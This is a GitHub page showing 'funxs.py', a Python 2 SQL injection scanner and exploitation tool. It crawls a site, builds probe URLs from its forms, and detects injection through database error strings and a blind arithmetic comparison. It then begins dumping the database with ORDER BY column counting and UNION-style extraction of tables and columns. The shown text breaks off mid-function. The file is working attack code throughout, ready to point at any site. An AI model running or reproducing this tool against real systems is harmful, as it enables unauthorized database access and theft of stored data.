-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathfunxs.py
More file actions
1246 lines (1201 loc) · 76.2 KB
/
funxs.py
File metadata and controls
1246 lines (1201 loc) · 76.2 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
import datetime
import re  # used by find_sql_vul (re.search); previously only in scope via the star import below
import urllib
import urlparse
import requests
import sys
import cgi
# NOTE: the star import below may export additional names; the explicit
# stdlib imports around it are kept in their original relative order so
# shadowing behavior is unchanged.
from BeautifulSoup import *
import time
# VARIABLES
# Message tags prepended to console output by the functions below.
wrn = "[WARNING]"  # tag for warning messages
inf = "[INFO]"     # tag for informational messages
# Colors for print
class bcolors:
    """ANSI terminal escape sequences used to colorize console output.

    Emit a color code before text and ENDC after it to reset the terminal.
    """
    HEADER = '\033[95m'     # bright magenta
    OKBLUE = '\033[94m'     # bright blue
    OKGREEN = '\033[92m'    # bright green
    WARNING = '\033[93m'    # bright yellow
    FAIL = '\033[91m'       # bright red
    ENDC = '\033[0m'        # reset all attributes
    BOLD = '\033[1m'        # bold text
    UNDERLINE = '\033[4m'   # underlined text
# Timestamp helper used as a prefix for progress/warning messages.
def tm():
    """Return the current wall-clock time formatted as "[HH:MM:SS]"."""
    stamp = datetime.datetime.now().strftime('%H:%M:%S')
    return "[%s]" % stamp
# Scrapping the entire WebSite
def crawler(url, quick):
urls = [url] # A list that all the links are going to be held initialized with the original url
visited = [url] # A list that keeps all the visited links
incl_url = url.split("/")[2] # A basic snippet of the original url tha must be included to all the links
prev_url = list() # A list that keeps the double links if Quick scan selected
# For all the links of the web page
print "Scraping...\n"
while len(urls) > 0:
try:
html = urllib.urlopen(urls[0]).read()
except:
urls.pop(0) # Removes the old urls
# print "Is not stable."
continue
soup = BeautifulSoup(html)
urls.pop(0) # Removes the old urls
links = soup('a', href=True)
for link in links:
new_page = urlparse.urljoin(url, link.get('href', None)) # Join the original url with the new link
# print new_page # Debugging
if incl_url in new_page and new_page not in visited:
if quick:
if "?" in new_page and new_page[:new_page.rfind('?')] in prev_url: # Avoid double checking the same URL
continue
if "?" in new_page and new_page[:new_page.rfind('?')] not in prev_url: # Avoid double checking the same URL
prev_url.append(new_page[:new_page.rfind('?')])
urls.append(new_page)
visited.append(new_page)
# print "visited", visited # Debugging
return visited
# 1. Finds and returns all the links that contain Forms
def find_forms(given_links, show_messages):
    """Scan *given_links* for HTML forms and build probe URLs from them.

    For each form found, the names of its text-like inputs (and selects) are
    collected and appended to the page URL as "name=2" parameters; the marker
    string "$@%#" plus the submit button's name/value is appended when a named
    submit input exists.  Returns a dict {crafted_url: request_method}.

    Cookies are read interactively as space-separated "name=value" pairs;
    when given, pages are fetched with requests instead of urllib.
    """
    form_list = {}           # crafted URL -> form method ("GET"/"POST")
    prev_url = list()        # query-stripped URLs already processed (skip dupes)
    prev_fdetails = list()   # "name:action" of forms already processed (skip dupes)
    c_name = list()          # Cookie names
    c_value = list()         # Cookie values
    print "Press Enter to continue without cookie"
    cookies = (raw_input('Enter cookies: ')).strip()  # Entering the cookies
    print ""
    c_split = cookies.split(" ")
    for c in c_split:  # Making a dict with the cookies
        c_name.append(c[:c.find('=')])
        c_value.append(c[c.find('=')+1:])
    cookies_dict = dict(zip(c_name, c_value))
    del c_name[:]  # Empties the old cookies
    del c_value[:]
    for url in given_links:
        move_tonext1 = False  # set when this form's name:action was already seen
        move_tonext2 = False  # propagates move_tonext1 out of the form loop
        if "?" in url and url[:url.rfind('?')] in prev_url:  # Avoid double checking the same URL
            continue
        if "?" in url and url[:url.rfind('?')] not in prev_url:  # Avoid double checking the same URL
            prev_url.append(url[:url.rfind('?')])
        if show_messages:
            print tm(), inf, "Connecting to the URL..."
        try:
            # Without Cookies
            if cookies == "":  # Checking if there are cookies or not
                html = urllib.urlopen(url).read()
                soup = BeautifulSoup(html)
            # With Cookies
            else:
                html = requests.get(url, cookies=cookies_dict).text
                soup = BeautifulSoup(html)
            if show_messages:
                print tm(), inf, "Target URL is stable..."
                print "..........\n.........."
        except:
            # NOTE(review): on fetch failure the loop does NOT continue here;
            # `soup` may then be unbound (first URL) or stale (later URLs).
            # The broad try/except around the form handling below absorbs the
            # resulting NameError - confirm this is intentional.
            print tm(), wrn, "Target URL is not stable!!!"
            print tm(), wrn, "Make sure you are connected to the internet.\n"
        variables = list()  # Keeps the injected code (URL parameters).
        slash = 0           # Checking how many '/' are in the URL.
                            # NOTE(review): counted per URL but incremented inside
                            # the per-form loop below - accumulates across forms
                            # of the same page; verify intent.
        data = ""           # Contains the parameters (payload) (e.g, 24)
        f_num = 0           # Counts the number of the forms.
        # FORMS
        try:
            if soup('form'):
                print "URL with Form:", url
                for frm in soup('form'):
                    # Progress messages.
                    f_num += 1
                    try:
                        f_name = frm['name']
                    except:
                        f_name = "-"         # form has no name attribute
                    try:
                        f_method = frm['method'].upper()
                    except:
                        f_method = "GET"     # default method per HTML spec
                    try:
                        f_action = frm['action']
                        if f_action == "#": f_action = ""  # added for DVWA (unclear whether it causes problems)
                    except:
                        f_action = url       # no action -> form posts to itself
                    for prev_nameact in prev_fdetails:  # Avoid double checking the same URL
                        if prev_nameact == f_name+":"+f_action:  # Checking if the Form name and action are used
                            move_tonext1 = True
                            break
                    if move_tonext1:  # Avoid double checking the same URL
                        move_tonext2 = True
                        break
                    prev_fdetails.append(f_name+":"+f_action)  # Updating with previous form details
                    if show_messages:
                        print tm(), inf, "Searching for Forms..."
                        print "=================================================="
                        print "Form", f_num
                        print "=================================================="
                        print tm(), inf, "Checking Form..."
                        print tm(), inf, "Form name: '" + f_name + "'..."
                        print tm(), inf, "Request method used:", "'" + f_method + "'..."
                    # Checking for the proper type of input
                    # NOTE(review): sub_name/sub_value are only assigned when a
                    # submit input is present; a first form without one would
                    # make the reference below raise (absorbed by the outer
                    # except) - confirm.
                    for tag in frm('input'):
                        if tag['type'] == "submit":
                            try:
                                sub_name = tag['name']
                                sub_value = tag['value']
                            except:
                                sub_name = ""
                                sub_value = ""
                        if tag['type'] == "text" or \
                           tag['type'] == "password" or \
                           tag['type'] == "email" or \
                           tag['type'] == "number" or \
                           tag['type'] == "search" or \
                           tag['type'] == "tel" or \
                           tag['type'] == "url":
                            variables.append(tag['name'])  # Gets the name of the input
                            if show_messages:
                                print tm(), inf, "Input type:", "'" + tag['type'] + "'..."
                    # Checking the "Select - Option" tags
                    for tag in frm('select'):
                        variables.append(tag['name'])  # Gets the name of the input
                    # Action fix
                    if f_action[-1:] == "/":  # Removes the last /
                        rem_slash = f_action[::-1].replace("/", "", 1)[::-1]
                        if "/" in rem_slash:  # Keeps the word after the last /
                            act = rem_slash[:rem_slash.rfind('/'):-1][::-1]
                        else:  # Keeps the word only since no / contained
                            act = rem_slash
                    elif "/" in f_action:  # Keeps the word after the last /
                        act = f_action[:f_action.rfind('/'):-1][::-1]
                    else:  # Keeps the word only since no / contained
                        act = f_action
                    if show_messages:
                        print tm(), inf, "Action:", "'" + act + "'..."
                    # URL fix
                    for char in url:  # Counts the /
                        if char == "/":
                            slash += 1
                    if slash < 3:  # If there are only the 2 slashes of "http//", add a / in the end of the URL
                        url += "/"
                    # For comparison with the Action: strip scheme and any trailing /
                    temp_url = url[url.find('/') + 2::1]
                    temp_url = temp_url.strip()
                    if temp_url.endswith('/'):
                        temp_url = temp_url[::-1].replace("/", "", 1)[::-1]
                    # For comparison with the URL
                    temp_act = act
                    temp_act = temp_act.strip()
                    if temp_act.endswith('/'):
                        temp_act = temp_act[::-1].replace("/", "", 1)[::-1]
                    if temp_url == temp_act:
                        url = url[:url.rfind('/')]
                    else:
                        url = url[:url.rfind('/') + 1] + act
                    if show_messages:
                        print tm(), inf, "New URL:", url
                    # Appending parameters to the URL
                    if show_messages:
                        print tm(), inf, "Forming the new URL..."
                    for var in variables: data = data + var + "=2&"
                    data = data[::-1].replace("&", "", 1)[::-1]  # drop the trailing '&'
                    if "?" in url:
                        new_page = url + "&" + data
                    else:
                        new_page = url + "?" + data
                    if show_messages:
                        print tm(), inf, "Formed URL:", new_page
                    if sub_name != "":  # If tag name isn't empty then the string "$@#%" is appended
                        new_page = new_page+"$@%#"+"&"+sub_name+"="+sub_value
                    form_list.update({new_page: f_method})
                    # Reinitialization
                    del variables[:]
                    data = ""
                    if show_messages:
                        print "\n"
            if move_tonext2:
                continue
        except:
            # best-effort: malformed forms / missing attributes skip this URL
            pass
    return form_list
# 2. Creates and returns the new links which arising out of the forms
# It used only for Forms (for the moment)
def find_sql_vul(vuln_pages):
    """Probe each form URL in *vuln_pages* ({url: method}) for SQL injection.

    Two techniques are attempted per URL:
      1. error-based: inject an apostrophe (replacing the "$@%#" marker when
         present) and search the response for known database error strings;
      2. blind: if the last parameter value is numeric N, request the page
         with "(N+1)-1" instead - an identical response suggests the server
         evaluated the arithmetic inside a query.

    Cookies are read interactively as space-separated "name=value" pairs.
    Returns a dict {original_url: method} of URLs judged injectable.

    NOTE(review): re.search below relies on `re` reaching module scope via
    `from BeautifulSoup import *`; an explicit `import re` would be safer.
    """
    vuln_links = {}     # URLs judged vulnerable -> request method
    vul_found = False   # set by the error-based check
                        # NOTE(review): never reset at the top of the loop, so
                        # one hit suppresses the blind check for all later
                        # URLs (it is only reset in the final else) - confirm.
    count = 0           # A flag that indicates either to show the number of the form or not
    c_name = list()     # Cookie names
    c_value = list()    # Cookies values
    d_name = list()     # Data names
    d_value = list()    # Data values
    # Fragments of well-known DB error messages; each value is applied to the
    # response body with re.search() (treated as a regex pattern).
    errors = {
        'MySQL': 'error in your SQL syntax',
        'SQLi_err': 'access shop category information',
        'MySQL_Valid_Argument': 'Supplied argument is not a valid MySQL result resource in',
        'MySQL_fetch': 'mysql_fetch_assoc()',
        'MySQL_array': 'mysql_fetch_array()',
        'MySQL_result': 'mysql_free_result()',
        'MySQL_start': 'session_start()',
        'MYSQL': 'getimagesize()',
        'MySQL_call': 'Call to a member function',
        'Oracle1': 'Microsoft OLE DB Provider for Oracle',
        'Mysql_re': 'Warning: require()',
        'MysQl_11': 'array_merge()',
        'MySQLi': 'mysql_query()',
        'Oracle': 'ORA-01756',
        'MiscError': 'SQL Error',
        'MiscError2': 'mysql_fetch_row',
        'MiscError3': 'num_rows',
        'JDBC_CFM': 'Error Executing Database Query',
        'JDBC_CFM2': 'SQLServer JDBC Driver',
        'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
        'MSSQL_Uqm': 'Unclosed quotation mark',
        'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
        'Postgrey_error': 'An error occurred',
        'SQL_errore': 'Unknown Column',
        'MS-Access_JETdb': 'Microsoft JET Database'
    }
    print "Press Enter to continue without cookie"
    cookies = (raw_input('Enter cookies: ')).strip()  # Entering the cookies
    print ""
    c_split = cookies.split(" ")
    for c in c_split:  # Making a dict with the cookies
        c_name.append(c[:c.find('=')])
        c_value.append(c[c.find('=')+1:])
    cookies_dict = dict(zip(c_name, c_value))
    del c_name[:]  # Empties the old cookies
    del c_value[:]
    for url, method in vuln_pages.items():
        count += 1
        if count > 1: print "\n"
        print "=================================================="
        print "Form", count
        print "=================================================="
        q = "'"  # the error-based payload: a single apostrophe
        if "$@%#" in url:
            new_page = url.replace("$@%#", q)  # marker sits where the payload belongs
        else:
            new_page = url + q
        try:
            print tm(), inf, "Connecting to the URL..."
            if cookies == "":  # Without Cookies # Checking if there are cookies or not
                if method == "POST":  # POST Method # Checking if the method is POST or GET
                    pure_url = url[:url.rfind("?")]  # Extracting the original URL
                    data_list = new_page[new_page.rfind("?")+1:].split("&")
                    for dl in data_list:  # Making a dictionary with data for the post request
                        d_name.append(dl[:dl.find('=')])
                        d_value.append(dl[dl.find('=')+1:])
                    data_dict = dict(zip(d_name, d_value))
                    del d_name[:]  # Empties the old data
                    del d_value[:]
                    html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text  # POST Request
                else:  # GET Method
                    html = urllib.urlopen(new_page).read()
            else:  # With Cookies
                if method == "POST":  # POST Method # Checking if the method is POST or GET
                    pure_url = url[:url.rfind("?")]  # Extracting the original URL
                    data_list = new_page[new_page.rfind("?")+1:].split("&")
                    for dl in data_list:  # Making a dictionary with data for the post request
                        d_name.append(dl[:dl.find('=')])
                        d_value.append(dl[dl.find('=')+1:])
                    data_dict = dict(zip(d_name, d_value))
                    del d_name[:]  # Empties the old data
                    del d_value[:]
                    html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text  # POST Request
                else:  # GET Method
                    html = requests.get(new_page, cookies=cookies_dict).text  # GET Request
            print tm(), inf, "Target URL is stable..."
            print "..........\n.........."
            print tm(), inf, "Injecting malicious code into the URL..."
            print tm(), inf, "Injected URL:", new_page
            print tm(), inf, "Testing for SQL injection..."
            # Trying error messages.
            for key, value in errors.items():
                if re.search(value, html):
                    print "\n", tm(), inf, "SQL injection is possible!"
                    print tm(), inf, "Error type:", key
                    print tm(), inf, "Injection type: error-based"
                    vuln_links.update({url: method})
                    vul_found = True
                    break
                else:
                    print tm(), inf, "Trying ", key+"..."
        except:
            # NOTE(review): after this warning the code still falls through to
            # the blind check, where `html` (and `pure_url` for POST) may be
            # unbound or stale from a previous iteration - confirm.
            print tm(), wrn, "Target URL is not stable!!!"
            print tm(), wrn, "Make sure you are connected to the internet.\n"
        # Second check - Checks if Quotes and Apostrophes are filtered (payload is a mathematical expression)
        if not vul_found:
            if "$@%#" in url:
                temp_before = url[:url.find('$@%#')]   # URL up to the marker
                temp_after = url[url.find('$@%#'):]    # marker + submit-button suffix
                int_check = temp_before[temp_before.rfind('=')+1:]  # last parameter value
            else:
                int_check = url[url.rfind('=')+1:]
                temp_after = ""
            if int_check.isdigit():  # only numeric parameters can take the math payload
                int_check = int(int_check) + 1  # payload becomes "(N+1)-1" == N
                if cookies == "":
                    if method == "POST":
                        data_list = url.replace("$@%#", "")[url.rfind("?")+1:].split("&")
                        for dl in data_list:  # Making a dictionary with data for the post request
                            d_name.append(dl[:dl.find('=')])
                            d_value.append(dl[dl.find('=')+1:])
                        data_dict = dict(zip(d_name, d_value))
                        del d_name[:]  # Empties the old data
                        del d_value[:]
                        html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text  # POST Request
                    else:
                        html = urllib.urlopen(url.replace("$@%#", "")).read()  # URL as it is
                    if "$@%#" in url:
                        # swap the last value (and everything after it) for "N+1-1", re-append the suffix
                        tampered_url = url.replace(url[url.find('$@%#')-1:], int_check.__str__() + "-1")
                        temp_after = temp_after.replace('$@%#', "")
                        if method == "POST":
                            data_list = (tampered_url + temp_after)[url.rfind("?")+1:].split("&")
                            for dl in data_list:  # Making a dictionary with data for the post request
                                d_name.append(dl[:dl.find('=')])
                                d_value.append(dl[dl.find('=')+1:])
                            data_dict = dict(zip(d_name, d_value))
                            del d_name[:]  # Empties the old data
                            del d_value[:]
                            html_compare = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text  # POST Request
                        else:
                            html_compare = urllib.urlopen(tampered_url + temp_after).read()  # URL with payload
                    else:
                        tampered_url = url.replace(url[url.rfind('=')+1:], "") + int_check.__str__() + "-1"
                        if method == "POST":
                            data_list = tampered_url[url.rfind("?")+1:].split("&")
                            for dl in data_list:  # Making a dictionary with data for the post request
                                d_name.append(dl[:dl.find('=')])
                                d_value.append(dl[dl.find('=')+1:])
                            data_dict = dict(zip(d_name, d_value))
                            del d_name[:]  # Empties the old data
                            del d_value[:]
                            html_compare = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text  # POST Request
                        else:
                            html_compare = urllib.urlopen(tampered_url).read()  # URL with payload
                else:
                    # Same flow as above but every request carries the cookies.
                    if method == "POST":
                        data_list = url.replace("$@%#", "")[url.rfind("?")+1:].split("&")
                        for dl in data_list:  # Making a dictionary with data for the post request
                            d_name.append(dl[:dl.find('=')])
                            d_value.append(dl[dl.find('=')+1:])
                        data_dict = dict(zip(d_name, d_value))
                        del d_name[:]  # Empties the old data
                        del d_value[:]
                        html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text  # POST Request
                    else:
                        html = requests.get(url.replace("$@%#", ""), cookies=cookies_dict).text  # URL as it is
                    if "$@%#" in url:
                        tampered_url = url.replace(url[url.find('$@%#')-1:], int_check.__str__() + "-1")
                        temp_after = temp_after.replace('$@%#', "")
                        if method == "POST":
                            data_list = (tampered_url + temp_after)[url.rfind("?")+1:].split("&")
                            for dl in data_list:  # Making a dictionary with data for the post request
                                d_name.append(dl[:dl.find('=')])
                                d_value.append(dl[dl.find('=')+1:])
                            data_dict = dict(zip(d_name, d_value))
                            del d_name[:]  # Empties the old data
                            del d_value[:]
                            html_compare = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text  # POST Request
                        else:
                            html_compare = requests.get(tampered_url + temp_after, cookies=cookies_dict).text  # URL with payload
                    else:
                        tampered_url = url.replace(url[url.rfind('=')+1:], "") + int_check.__str__() + "-1"
                        if method == "POST":
                            data_list = tampered_url[url.rfind("?")+1:].split("&")
                            for dl in data_list:  # Making a dictionary with data for the post request
                                d_name.append(dl[:dl.find('=')])
                                d_value.append(dl[dl.find('=')+1:])
                            data_dict = dict(zip(d_name, d_value))
                            del d_name[:]  # Empties the old data
                            del d_value[:]
                            html_compare = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text  # POST Request
                        else:
                            html_compare = requests.get(tampered_url, cookies=cookies_dict).text  # URL with payload
                if html == html_compare:  # Checking pages for differences (If no differences)
                    # identical pages -> the "(N+1)-1" arithmetic was evaluated
                    # server-side -> blind injection looks possible
                    print ""
                    print tm(), wrn, "Seems like apostrophes and quotation marks are screened with backslashes."
                    print tm(), inf, "Trying another method."
                    print tm(), inf, "Original URL:", url.replace("$@%#", "")
                    print tm(), inf, "Injected URL:", tampered_url + temp_after
                    print "\n", tm(), inf, "SQL injection is possible!"
                    print tm(), inf, "Error type: disabled"
                    print tm(), inf, "Injection type: blind"
                    vuln_links.update({url: method})
                else:  # If there is a difference
                    print ""
                    print tm(), inf, "SQL Injection is not possible"
                    vul_found = False
    return vuln_links
# 3. Scans and displays all the information extracted from the DataBase
def find_db_info(vuln_links):
count = 0
for vul_page, method in vuln_links.items():
skata = "" # For testing and only
form_mode = False
scan_db = False # For continue scanning database
par_break = False
cont_union = False # For continue with union technique
search_columns = False # You can choose rather to search for information or not
result_limit = False # You can choose rather to limit results by 10 or not
sp = "" # Setting up a way to put spaces
column_num = 0 # Initializing column number
clmn_list = "1" # Initializing column list
db_payload1 = "version()" # Payload 1 for database version
db_payload2 = "" # Payload 2 for database version
should_restart = True # Start the loop from the beginning
payload_counter = 0 # Counter for choosing the payload to put each time
tbl_limit = 1 # Increasing the limit to find more tables
clmn_limit = 1 # Increasing the limit to find more columns
clinfo_limit = 1 # Increasing the limit to find more information
tbl_num = 1 # Increasing the limit to find more columns
tbl_out1 = 0 # Flag for getting out of a specific loop
tbl_out2 = 0 # Flag for getting out of a specific loop
clmn_out1 = 0 # Flag for getting out of a specific loop
clmn_out2 = 0 # Flag for getting out of a specific loop
clinfo_out1 = 0 # Flag for getting out of a specific loop
clinfo_out2 = 0 # Flag for getting out of a specific loop
num = 1 # Iterating between tables
rem_clmn = 0 # A number that defines the columns to be removed
concat_string = "" # String appended with table's columns for the concat query
tbl_changed1 = True # When true, the table changes
tbl_changed2 = False # When true, the table changes
first_info = list() # List with the first three info
tables = list() # List with tables
        columns = list() # List with columns (I think the difference from the list below is that this one is used so the columns are displayed correctly at the end)
        columns_forinfo = list() # List with columns (while this one is needed to actually do the work on the information, i.e. to find it)
column_info = list() # List with the columns information
fake_diff = False # Getting inside the if statement without having found any difference
c_name = list() # Cookie names
c_value = list() # Cookie values
d_name = list() # Data names
d_value = list() # Data values
        words = [] # Stores the differing words. Used so the table/column can be changed if a message is displayed instead of nothing (fake-diff alternative)
same_word = False # Flag that indicates that a message is displayed (e.g, Invalid Input parameter)
tbl_del = 0 # Flag that allows to remove the last table for the list (e.g, Invalid Input parameter)
last_clmn_remove = False # Flag to remove the last column from the list, if there is a message like (Invalid Input parameter)
count += 1
if count > 1: print "\n\nYou can continue scanning the", count, "link"
if "$@%#" in vul_page:
form_mode = True
# Choose to scan the DB for info
while True:
print "\n\n1. Scan for database"
print "2. Exit"
ch = raw_input("")
print ""
if ch == "1":
scan_db = True
break
if ch == "2":
exit()
break
# Spaces preferences
while True:
print "\nSet a way of spacing"
print "1. +"
print "2. /**/"
ch = raw_input("")
print ""
if ch == "1":
sp = "+"
break
if ch == "2":
sp = "/**/"
break
# Limit preferences
while True:
print "\nSet a limit start point"
print "1. limit 0,1 --"
print "2. limit 1,1 --"
ch = raw_input("")
print ""
if ch == "1":
tbl_limit = 0
clmn_limit = 0
clinfo_limit = 0
set_tbl_lmt = 0 # initiates the table limit inside the loop
set_clmn_lmt = 0 # initiates the column limit inside the loop
set_clinfo_lmt = 0 # initiates the column info limit inside the loop
break
if ch == "2":
tbl_limit = 1
clmn_limit = 1
clinfo_limit = 1
set_tbl_lmt = 1 # initiates the table limit inside the loop
set_clmn_lmt = 1 # initiates the column limit inside the loop
set_clinfo_lmt = 1 # initiates the column info limit inside the loop
break
# Checks for string based injection (If it's a number but not an int, it's considered as an int and it doesn't works)
if form_mode:
if vul_page.count("=") > 1:
temp_vul_page = vul_page[:vul_page.find('$@%#')]
string_check = temp_vul_page[temp_vul_page.rfind('=')+1:]
# print "Form Mode with more than one =", string_check # Debugging
else:
string_check = vul_page[vul_page.rfind('=')+1:]
# print "Form Mode with one =", string_check # Debugging
else:
string_check = vul_page[vul_page.rfind('=')+1:]
# print "Not Form Mode", string_check # Debugging
if not string_check.isdigit():
if form_mode:
vul_page = vul_page.replace("$@%#", "'$@%#")
else:
vul_page += "'"
plus = sp + "-"
else:
plus = ""
print ""
print "Press Enter to continue without cookie"
cookies = (raw_input('Enter cookies: ')).strip()
c_split = cookies.split(" ")
for c in c_split:
c_name.append(c[:c.find('=')])
c_value.append(c[c.find('=')+1:])
cookies_dict = dict(zip(c_name, c_value))
del c_name[:]
del c_value[:]
# Scanning DB for average columns using ORDER BY clause
if scan_db:
# 1) Order by (default)
print tm(), inf, "ORDER BY technique seems to be usable"
proggress = "["+datetime.datetime.now().time().strftime('%H:%M:%S')+"] [ - ] searching..." # Graphic progress.
par = ""
for par_num in range(1, 6): # Checking for parentheses and how many
for column in range(1, 50): # Scanning for 50 columns with a payload (without the --)
sys.stdout.write(proggress+".") # Graphic progress.
ord_by_err_glassfish = "Unknown column '"+column.__str__()+"' in 'order clause'"
ord_by_err = "Unknown column '"+column.__str__()+"' in 'order clause'"
ord_by_err2 = "mysql_fetch_array()"
if form_mode:
db_url = vul_page.replace("$@%#", par + sp + "order" + sp + "by" + sp + column.__str__() + "--" + plus) # Order by Payload
# print "Form mode enabled", db_url # Debugging
else:
db_url = vul_page + par + sp + "order" + sp + "by" + sp + column.__str__() + "--" + plus # Order by Payload
# print "Form mode disabled", db_url # Debugging
try:
if cookies == "":
# print "NO COOKIES" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = db_url[db_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
db_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
# print "METHOD GET" # DEBUGGING
db_html = urllib.urlopen(db_url).read()
else:
# print "WITH COOKIES" # DEBUGGING
if method == "POST": # POST Method # Checking if the method is POST or GET
# print "METHOD POST" # DEBUGGING
pure_url = vul_page[:vul_page.rfind("?")] # Extracting the original URL
data_list = db_url[db_url.rfind("?")+1:].split("&")
for dl in data_list: # Making a dictionary with data for the post request
d_name.append(dl[:dl.find('=')])
d_value.append(dl[dl.find('=')+1:])
data_dict = dict(zip(d_name, d_value))
del d_name[:] # Empties the old data
del d_value[:]
db_html = requests.post(pure_url, data=data_dict, cookies=cookies_dict).text # POST Request
else:
db_html = requests.get(db_url, cookies=cookies_dict).text
except:
print tm(), wrn, "Injected URL is not stable!!!"
print tm(), wrn, "Please make sure you are connected to the internet and try again"
break
if re.search(ord_by_err, db_html) or re.search(ord_by_err_glassfish, db_html) or re.search(ord_by_err2, db_html):
column_num = column - 1 # Setting the number of the columns that have been found
# print "Aaaaaaaaaaaaaaaaaaaa", column_num # Debugging
par_break = True
break
proggress = ""
if par_break: break # Breaking the loop when the used number of parentheses found
par += ")" # Increasing the number of parentheses
plus = sp + "-" # Appending the minus at the end (Needed when parentheses are opened)
print ""
if column_num == 0:
print tm(), inf, "Unable to find the number of the columns"
while True:
ch = raw_input("Do you want to perform a String Based Attack? [y/N]: ")
if ch == "y" or ch == "Y":
str_based = True
if form_mode:
vul_page = vul_page.replace("$@%#", "'$@%#")
else:
vul_page += "'"
plus = sp + "-"
break
if ch == "N" or ch == "n":
exit()
else:
print tm(), inf, "The target URL appears to have", column_num, "column(s) in query"
str_based = False
# 2) Order by (String Based)
if str_based:
proggress = "["+datetime.datetime.now().time().strftime('%H:%M:%S')+"] [ - ] searching..." # Graphic progress.
par = ""
for par_num in range(1, 6): # Checking for parentheses and how many
for column in range(1, 50): # Scanning for 50 columns with a payload (without the --)
sys.stdout.write(proggress+".") # Graphic progress.
ord_by_err_glassfish = "Unknown column '"+column.__str__()+"' in 'order clause'"
ord_by_err = "Unknown column '"+column.__str__()+"' in 'order clause'"
ord_by_err2 = "mysql_fetch_array()"
if form_mode:
db_url = vul_page.replace("$@%#", par + sp + "order" + sp + "by" + sp + column.__str__() + "--" + plus) # Order by Payload
# print "Form mode enabled", db_url # Debugging
else:
